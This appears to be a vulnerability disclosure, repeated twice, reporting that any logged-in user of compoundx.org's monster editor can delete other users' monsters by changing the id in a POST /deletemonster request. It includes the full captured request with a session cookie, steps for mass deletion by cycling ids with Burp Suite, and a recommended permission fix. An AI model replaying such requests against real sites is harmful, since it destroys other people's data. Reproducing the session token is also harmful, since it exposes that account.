Impact:
Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.
Steps to reproduce:
- Navigate to https://www.compoundx.org and log in with a valid username and password.
- Navigate to https://www.compoundx.org/monstereditor
- Capture the packet sent by clicking the Delete button next to an enemy on the right sidebar (Shown below).
- Change the monster id (91 in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy in mind and know its id.
- Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass deletion.
Using the below packet, I was able to delete every monster in the database by replacing §§ with integers from 1 to 91 inclusive with Burp Suite. I determined that 91 was the maximum monster id by creating a new monster prior to executing the deletions, though I could have simply run 1 through 1000.
POST /deletemonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monstereditor
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt7TA.ZxYMIpqwBmavRPoViTS84kGQ09w
Recommended fix:
Adding in permissions that disallow (non-admin) users from deleting monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting monsters owned by other users.
Impact:
Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.
Steps to reproduce:
Using the below packet, I was able to delete every monster in the database by replacing §§ with integers from 1 to 91 inclusive with Burp Suite. I determined that 91 was the maximum monster id by creating a new monster prior to executing the deletions, though I could have simply run 1 through 1000.
POST /deletemonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monstereditor
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt7TA.ZxYMIpqwBmavRPoViTS84kGQ09w
Recommended fix:
Adding in permissions that disallow (non-admin) users from deleting monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting monsters owned by other users.